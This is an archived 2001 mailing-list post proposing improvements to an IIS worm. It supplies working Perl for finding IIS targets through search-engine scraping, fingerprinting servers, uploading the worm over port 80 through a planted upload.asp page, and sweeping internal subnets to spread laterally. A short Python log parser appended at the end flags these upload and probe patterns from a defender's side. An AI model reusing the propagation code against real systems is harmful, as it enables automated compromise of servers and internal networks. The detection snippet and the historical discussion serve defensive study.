[iwar] [fc:Enhanced.worm.code.proposed.in.source.form...]

From: Fred Cohen (fc@all.net)
Date: 2001-09-19 19:01:47


To: iwar@onelist.com (Information Warfare Mailing List)

(excuse the X posting - I don't know where it will be moderated)
Moderators,

Here are some comments and code on the new worm. Publish if you think it might
do any good. If not I'll understand 100%.

--cut--

Three things that could have made the worm better/worse:

1. Targeting
------------
The targeting sucks. Random targeting is just SO ancient, and it's simply
not nice. Why not use the technology out there - search engines. Let's say
I want to get some random 1000 Microsoft IIS servers - I get on to Google
and search for:

<random word here> +.asp -"application service provider"

..and browse through the list. In fact hereby a sweet little piece of PERL
that will do just that:

#!/usr/bin/perl
use Socket;
$host="www.google.com";
$port=80;
@nogos=("av.com","yahoo","google.com","excite","lycos","geocities");
$target = inet_aton($host);
$term="computer";

for ($i=0; $i<1000; $i=$i+100){
 @response=sendraw("GET /search?q=$term+%22.asp%22+-application+-service+-provider&num=100&hl=en&safe=off&start=$i&sa=N HTTP/1.0\r\n\r\n");
 foreach $line (@response){
  if ($line =~ /http/){
   ($duh,$one)=split(/\/\//,$line);
   if ($one =~ /\.asp/) {
    ($two,$duh)=split(/\//,$one);
    $flag=0;
    foreach $nogo (@nogos){
     if ($two =~ /$nogo/){$flag=1;}
    }
    if ($flag==0){$url{$two}++;print $one;}
   }
  }
 }
}
foreach $theurl (keys(%url)){
 print "site: $theurl";
}

###good old sendraw
sub sendraw { 
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || return "";
 if(connect(S,pack "SnA4x8",2,$port,$target)){
  my @in="";
  select(S); $|=1; print $pstr;
  while(<S>) { 
   push @in,$_; last if ($line=~ /^[\n\r]+$/ );}
  select(STDOUT); return @in;
 } else { return ""; }
}

And there you go +- 1000 targets +- 75% of them nice fresh IIS boxes.
Select a new term, and hey - another 1000 IIS servers. Just shove a list
with 10000 terms in there, choose a random one and mine..it does not have
to be Google - there are zillions of search engines out there - pick a
random one. Now - isn't that a bit more effective than hitting random
boxes?? Then - why the heck hit a box when you're not even sure it's an
IIS server? DUH!!!

##check for IIS
sub isms{
 ($name)=@_;
 @results = sendraw("HEAD / HTTP/1.0\r\n\r\n");
 foreach $line (@results){
  if ($line =~ /Microsoft/) {return "1";}
 }
 return "0";
}

2. Getting the worm at the other end.
-------------------------------------
TFTP?? NOT! Why - is everyone allowing UDP to pass? I think not. How many
hosts allow outside connections? Grim - simply grim. Just not cricket.
Why not get the worm on the box with HTTP only? Say - you can execute a
command on the server right? And do an "echo" right?? Why not create a
page where you can upload anything? Hereby the uploader to upload the worm
to the next host.

Uploader itself:

####use like this:$uploadresult=loader($host,$updir,$filename);
sub loader{
($host,$dir,$filename)=@_;
$target = inet_aton($host);
$headerfile=<<EOT
-----------------------------6628240843774015751103527590
Content-Disposition: form-data; name="File1"; filename="$filename"
Content-Type: application/octet-stream

EOT
;
$footerfile=<<EOT

-----------------------------6628240843774015751103527590
Content-Disposition: form-data; name="Action"

Upload the file
-----------------------------6628240843774015751103527590--
EOT
;

$headerfile=~s/\n/\r\n/g;
$footerfile=~s/\n/\r\n/g;
my $file;
open (IN,$filename) || return "1";
binmode(IN);
while (<IN>){
 $file=$file.$_;
}
$subheader=$headerfile.$file.$footerfile;
$filelength=length($subheader);
print "length of the request is $filelength\n";
$headerhttp=<<EOT
POST /$dir/upload.asp HTTP/1.0
User-Agent: None
Host: $host
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png,*/*
Accept-Encoding: gzip
Accept-Charset: iso-8859-1,*,utf-8
Content-type: multipart/form-data; boundary=---------------------------6628240843774015751103527590
Content-Length: $filelength

EOT
;
$headerhttp=~s/\n/\r\n/g;  
$fullrequest=$headerhttp.$subheader;
@r=sendraw($fullrequest);
foreach $line (@r){
 if ($line=~/Olifante/) {return "0";}
}
return "1";
}

That's the loader itself. The page to create the upload page on the server
has been documented extensively before by myself. Go to packetstorm, and
search for "unitools". The tar file contains the upload pages and the code
to create the files on the server.

With this, the worm can be propagated through firewalls that do NAT and
filter everything but port 80. Only 80...that's all you need.

3. Further spread
-----------------
In many instances, webservers are connected with 1:1 NAT behind a
firewall. IP numbers of webservers in such scenarios are 10s, 172.16 and
192.168s. Now - again - if the server can't go out - why not go
in? Look at the class C, test for hosts there and spread internally:

@results=`ipconfig`;
foreach $line (@results){
 chomp $line;
 if ($line=~/Addr/){
  ($duh,$myip)=split(/:/,$line);
 }
}
##start internal scan
$num=0;
($one,$two,$three,$duh)=split(/\./,$myip);
for ($i=1; $i<255; $i++){
 $scanip=$one.".".$two.".".$three.".".$i;
 @results=`ping -n 1 -w 40 $scanip`;
 foreach $scanned (@results){
  if ($scanned =~ /TTL/) {
   $eight=Sconnect(80,$scanip);
   if ($eight ==1){
    $ismic=isms($scanip);
    if ($ismic eq "1"){
     ($duh,$miner)=split(/from/,$scanned);
     (@mine[$num],$duh)=split(/\:/,$miner);
     @mine[$num] =~ s/ //g; 
     $num++;
    }
   }
  }
 }
}
sub Sconnect
{
 my($port,$address)=@_;
 my $ret=0;
 my $protocole=(getprotobyname("tcp"))[2];
 my $MASK="S n a4 x8";
 my @byte=split /\./, $address;
 $packAddress=pack("C4",@byte);
 my($connectPointer)=pack($MASK,&AF_INET,$port,$packAddress);
 socket(SOCKET,&AF_INET,&SOCK_STREAM,$protocole)||die "Socket SConnect: $!\n";
 if(connect(SOCKET,$connectPointer)){
  $ret=1;
  close SOCKET;
 } 
 return $ret;
}  

With this we get all IIS servers on the class C. Anyhow..

Bottom line? Well - just this - worms can be much more effective - so
beware - this is just the start. The Outlook/IE bit - nicely done (in a
severe twisted sense). 

Have a wonderful day,
Roelof.

------------------
http://all.net/ 
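The post describes three server-side footprints a defender could look for: a POST to an upload.asp page carrying the worm as multipart/form-data (sent with "User-Agent: None"), a bare "HEAD /" banner probe from a neighbouring RFC 1918 address during the internal sweep, and nothing else over port 80. The following is an added example, not code from the post or from Roelof's tools; it parses constructed IIS W3C log lines (the field list and sample records are invented) and flags those two patterns.

```python
import ipaddress
from collections import Counter

# Constructed sample IIS W3C extended log excerpt (not from the original post).
# Fields: date time c-ip cs-method cs-uri-stem sc-status cs(User-Agent)
# IIS writes "-" when the User-Agent field is empty.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status cs(User-Agent)
2001-09-19 02:01:31 203.0.113.7 GET /default.asp 200 Mozilla/4.0+(compatible;+MSIE+5.5)
2001-09-19 02:01:40 192.168.1.23 HEAD / 200 -
2001-09-19 02:01:41 192.168.1.23 POST /scripts/upload.asp 200 None
2001-09-19 02:01:42 203.0.113.7 HEAD / 200 Mozilla/4.0+(compatible;+MSIE+5.5)
2001-09-19 02:01:50 192.168.1.23 GET /default.asp 200 None
"""

PRIVATE_NETS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_private(ip):
    """True if ip is inside one of the RFC 1918 ranges named in the post."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in PRIVATE_NETS)

def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        yield dict(zip(fields, line.split()))

def find_worm_indicators(text):
    """Return (c-ip, reason) for records matching the propagation pattern."""
    hits = []
    for rec in parse_w3c(text):
        ip, method = rec["c-ip"], rec["cs-method"]
        stem, ua = rec["cs-uri-stem"].lower(), rec["cs(User-Agent)"]
        if method == "POST" and stem.endswith("/upload.asp"):
            hits.append((ip, "POST to upload page"))
        elif method == "HEAD" and stem == "/" and is_private(ip) and ua in ("-", "None"):
            hits.append((ip, "banner probe from internal host"))
    return hits

def suspicious_sources(text):
    """Count indicator hits per source address so the loudest peer stands out."""
    return Counter(ip for ip, _ in find_worm_indicators(text))
```

A single HEAD / from an internal address is weak on its own; the same address following it with a multipart POST to upload.asp is the sequence the post describes, so correlate by c-ip rather than alerting on either line alone.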

This archive was generated by hypermail 2.1.2 : 2001-09-29 21:08:45 PDT